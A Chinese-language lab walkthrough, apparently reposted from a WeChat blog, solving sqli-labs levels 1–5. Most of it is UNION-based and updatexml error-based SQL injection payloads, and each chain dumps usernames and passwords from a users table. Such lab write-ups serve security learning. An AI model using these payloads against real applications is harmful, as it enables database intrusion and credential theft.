sqli-labs(1-5)

admin
admin
admin
104377
文章
87
评论
2022年3月30日20:14:59评论50 views字数 2501阅读8分20秒阅读模式

Less-1


  • 输入参数,判断注入点


sqli-labs(1-5)


sqli-labs(1-5)


sqli-labs(1-5)


  • 这里用联合查询进行注入

id=1' order by 3-- -


sqli-labs(1-5)


id=-1' union select 1,2,3-- -


sqli-labs(1-5)


id=-1' union select 1,database(),version()-- -


sqli-labs(1-5)


id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()-- -


sqli-labs(1-5)


id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name="users"-- -


sqli-labs(1-5)


id=-1' union select 1,group_concat(username,0x7e,password),3 from users-- -


sqli-labs(1-5)



Less-2


  • 这里还是先尝试单引号,但看报错信息这里显示有两个单引号,那就说明这个应该直接用and1=1和and1=2进行判断


id=1 and 1=1id=1 and 1=2


sqli-labs(1-5)


  • 继续使用联合查询进行注入


id=1 order by 3id=-1 union select 1,2,3id=-1 union select 1,database(),3id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema= database()id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name="users"id=-1 union select 1,group_concat(username,0x7e,password),3 from users


sqli-labs(1-5)


sqli-labs(1-5)


sqli-labs(1-5)


sqli-labs(1-5)



Less-3


  • 第三关我还是先尝试用单引号报错,报错信息引号是没问题,但后面多了个括号,尝试把括号闭合并且把后面注释掉


id=2')-- -


sqli-labs(1-5)


  • 这里还是用联合查询进行注入


id=2') order by 3-- -id=-2') union select 1,2,3-- -id=-2') union select 1,database(),3-- -id=-2'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema= database()-- -id=-2') union select 1,group_concat(column_name),3 from information_schema.columns where table_name="users"-- -id=-2'union select 1,group_concat(username,0x7e,password),3 from users-- -


sqli-labs(1-5)


sqli-labs(1-5)


sqli-labs(1-5)


sqli-labs(1-5)



Less-4


  • 第四关,这里尝试单引号报错,但没反应,那就尝试双引号报错,看报错信息,还有个括号,那就双引号括号闭合,后面的用-- -注释


id=4")-- -


sqli-labs(1-5)


  • 还是使用联合查询进行注入


id=4") order by 3-- -id=-4") union select 1,2,3-- -id=-4")union select 1,database(),3-- -id=-4") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema= database()-- -id=-4") union select 1,group_concat(column_name),3 from information_schema.columns where table_name="users"-- -id=-4") union select 1,group_concat(username,0x7e,password),3 from users-- -


sqli-labs(1-5)


sqli-labs(1-5)


sqli-labs(1-5)


sqli-labs(1-5)



Less-5


  • 第五关,还是尝试单引号报错,看报错信息没问题,直接把后面注释掉就好了


id=5'-- -


sqli-labs(1-5)


  • 这里使用联合查询,会发现没有显位,只能通过报错判断,那么这里使用报错注入尝试

  • 报错有floor()、updatexml()、extractvalue()等函数,这里使用updatexml()函数,不过这个函数显示限制字数,可以自行添加截断函数输出


id=5' and updatexml(1,concat(1,database(),0x7e),1)-- -


sqli-labs(1-5)


  • 这里查询表名的时候,会提示报错,使用limit函数让它一个一个输出就可以了,可以看到第四个是"users" limit 3,1 就是第四个,这个函数不懂的可以百度一下,讲的很详细


id=5' and updatexml(1,concat(1,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1)-- -


sqli-labs(1-5)


  • 原理同上,查询出字段名,第二个和第三个是username和password


id=5' and updatexml(1,concat(1,(select column_name from information_schema.columns where table_name="users" limit 0,1),0x7e),1)-- -


sqli-labs(1-5)


sqli-labs(1-5)


  • 同理查出账户密码


id=5' and updatexml(1,concat(1,(select (username) from users limit 0,1),0x7e),1)-- -id=5' and updatexml(1,concat(1,(select (password) from users limit 0,1),0x7e),1)-- -


sqli-labs(1-5)


sqli-labs(1-5)

原文始发于微信公众号(SUMMER渗透学习):sqli-labs(1-5)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年3月30日20:14:59
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   sqli-labs(1-5)http://cn-sec.com/archives/853932.html

发表评论

匿名网友 填写信息